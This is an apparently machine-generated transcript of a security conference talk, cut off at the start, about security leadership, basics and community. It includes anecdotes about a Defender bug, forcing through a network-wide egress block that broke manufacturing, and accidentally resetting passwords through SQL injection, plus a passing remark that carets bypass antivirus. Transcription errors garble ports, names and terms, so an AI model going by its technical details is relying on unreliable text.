some reason who'd be like this is being blocked by Hannover stone would work well my second one my third one fourth one wouldn't work and then I realized there was a bug in defender where if you submitted something in PowerShell from the command line if for some reason their their logic layer started marking every single command as malicious so if you did like a equals one it like you're being blocked by antivirus equals to being Wi-Fi antivirus you have to restart your computer to get rid of that that's a big bug that they actually ended up fixing which is good so that's kind of all over the place I'm not sure exactly what's going on over there

Oh still in the

there we go so number five leadership people leadership and communication is extremely important where I see most programs fail as not having the right leadership in place and what I mean by that is when I was I was the chief security officer for Diebold for a number of years and when I got the Diebold there's actually a great talk over at Derby Con this year that I gave him and my CIO came and one of the two of the folks that I work with on a security team came we all talked about how we were successful at our company and what was interesting is that the CIO and me were best friends and we worked

together to do what was right for that company and no matter what it was and whether it was hey you're being too crazy on security well Duke it out and figure it out in the parking lot you know we're just friends trying to figure things out in the right way of doing things and we got more accomplished in three years than I've seen any other program moving in five or ten and a lot of that had to do with my first became the chief security officer over a Diebold what did i do that i repel technology no did I go and I hire a whole bunch of people no I wouldn't I bought a whole bunch of beer and pizza

for the IT folks like like a whole bunch of times and because I became friends with them like hey I have your back you have mine one of the funny stories that I had with Diebold is that at the time we were looking at implementing scan safe which was it got acquired by Cisco and scan see was a phenomenal product the way that they did at the time is they had these things called beacon servers and you could basically proxy chain your beacon servers so that you didn't go out 18 four four three across your environment anymore okay so my goal was to disallow all egress ports period and only allow 18 for for three four

specific exceptions and 21 for specific exceptions across our entire global enterprise ok it's pretty awesome peak right no egress ports whatsoever and 84 for 3 completely gone across the entire network you can't egress out 84 for 3 unless you go out through the proxy and then hit with scan safe which is SSL termination and everything else we had good visibility into and so I had this project where it should take a normal company probably what a year to implement something like that right across your globe maybe six months did in three weeks and the way that I did it is as I tried to find a a we were a big ITIL shop okay and I found a change

control request that had to do something with like tweaking this can save server and I'm like hey mark and Marcos in and networking he's like I'm like hey man I'm like can you uh can you just make this one rule I think I got everything done but quemic this one rule we are blocking 84 for three across the entire company and he's like man I think that's a good idea you're gonna break some stuff I'm like it's okay there's this there's this change control thing here that that you know is kind of like that it kind of sounds like it so he can just tuck underneath there and see if it works and he's like nah man I'm not

gonna do it so I went to when it's a Scott there's a guy next to him like hey man can you get Haiti for four three two cross the network and it's kind of like he's like you say I think it's a good idea and I'm like listen you're getting trouble I'll take all the blame for it okay and so we ended up doing this sweeping change across our entire company within three weeks and broke our entire production instances of where they produced a TMZ because they used these signing to sign the actual boards for each ATM and stop production of all our manufacturing facilities for both of those like I was like poor horse wasn't

a big deal but but good enough we didn't get in any trouble whatsoever because it was a specific change we're trying to accomplish across our entire environment and so you know funny stories like that a story after story to store we had a customer application where I accidentally found on blind sequel injection and and I overrode everybody's password the same one on accident and completely crash the application yeah so you learn you're right Oz and I was younger and younger Dave younger Dave but the piece I wanted to hit with this and then the leadership piece was like the folks that I worked with knew that I had their back no matter what if they

messed up or if I messed up we had each other's backs no matter what I would go to bat for them I would make sure that they had the right resources to be able to accomplish what they needed to do leadership is really really important people is really really important to have people to go and do things to help you out communication is really really important I didn't just go and do things and just like hey I'm gonna shut this down and that's that I worked with people and communicating this those specific things with why we're doing things to an organization well then I'll say is that if you can't make a change in a company move on i time and time

again i go to a person or organization like man we really want to come in because i want you to smash our entire company because our IT folks are just won't do anything we're doing and I'm the only person in security and they don't want to do anything we have 100,000 people and there's one person that a key to the security you know this is this is you know my struggle every single day I'm just fighting fires every day and I can't do it anymore if you can't make a change in a company that you're working with it's time to move on move to a place that will make a change move to a company that wants to change in the way

to get better for information security and I'm a huge advocate of that you if you're at a place where you're no longer feeling effective or you've already done your job you've already left your legacy on to that's--that's is that into that organization go somewhere else and do it again it's awesome it's exciting it's fun it's exhilarating you do new things you get to figure things out in a different way all those things become really really important so I'm closing the five things right I talked about what I talked about I remember sharing a collaboration right leadership and communication behavior right what was the other one I press the other one the basics there we go the

basics that I was looking for the basics all of those things make up what we are today insecurity and and it's really easy to get sucked into hey I need to start going off these living off the land by owners and scripts and blocking all this stuff when we still have half or one out there focusing on the basics becomes really really important in your environment collaborating with people becomes really really important what are you doing I thought I was getting smirnoff ice here for a second so I say you know what's really awesome is is events like this like b-sides is amazing when he's like hey can you come out here and speak at b-sides I make sure what's

the date let me make sure it works not fly on a plane come on here in two seconds you know it's amazing that we have a community of people that want to share their experiences that want to work together to collectively make the world a better place and that's exactly what we're doing so you know we're working together figuring things out we're making things better and I could say again I've been in this industry for a long time it's like 18 years which is really friggin weird that I have been in this industry for 18 years 19 years 2000-2001 got into the security space 19 years almost 20 years which is horrible I mean I'm not getting old you know 20

years in one individual industry and I can say over the span of 20 years we've gotten so much better as an industry working in case you need to do that again and see your point earlier in your presentation you know paving the way for our next generation of kids getting out of the way and stop being that that person's like hey you need to you know build your own cat5 cables in order to get a job here you know things changed quite a bit in 20 years it's no longer on mudding days anymore it's no longer you know modems and BBS is you know we're doing things in a different way that we had before and it's better

it's not it's just better I love all these showstoppers when the cloud came like we were gonna stop in the first place really or even even waterfall like we're not gonna eventually go to agile to get stuff out faster like hey what you're saying is that I can get all my stuff out way faster and I'd have to hire anymore resources yeah but it's gonna be a whole bunch of bugs in it but Han you said I can get it out faster and get some across yeah but it's gonna be security holes no what you said is it's gonna be out faster like that was gonna stop a business right or a cloud hey we

don't have to hire all IT folks which by the way best thing ever right hey you get to move to the cloud you have to worry about IT folks you'll have to worry about you know scalability of everything is that true no cetera in fact I would say are the past nine engagements that I've done going after our cloud environment I've broken into every single nine one of those cloud environments based on configuration issues so again doesn't mean necessarily better anyways we're all working together to come together to get better what we're doing and so let's continue to make the world a safer place in security I think we're all doing that right now share your experiences figure out what

makes you unique and and share those experiences here great on stage and start talking about this so that's what makes us an amazing collaborative industry and it's just going to continue to grow as it is and just want to give a special shout out to Jack Daniel over there for all the stuff he does for b-sides let's give a round of applause

that is an incredible man right there one that I've gotten to known or the many years and Jack probably didn't even know the story about when I first got introduced to Jack Daniel if he goes at shmoocon two or three Jack was out ranting and raving about something cybersecurity at the UH Nepal security weekly podcast on the outside area there and I was like man this guy's really really smart and I just sat down and listened to him and since then I've been a follower of Jack for was we've gone through what do we got now I don't even know it's been lots I guess that we're getting old so you know 15 years or whatnot so you know

it's incredible person over there so again makes things again Jack for all you do so thank you all very much for coming out to my talk I hope you learned something new you know remember three carats completely bypass anything else out there you're all set but I think you all very much besides appreciate [Applause]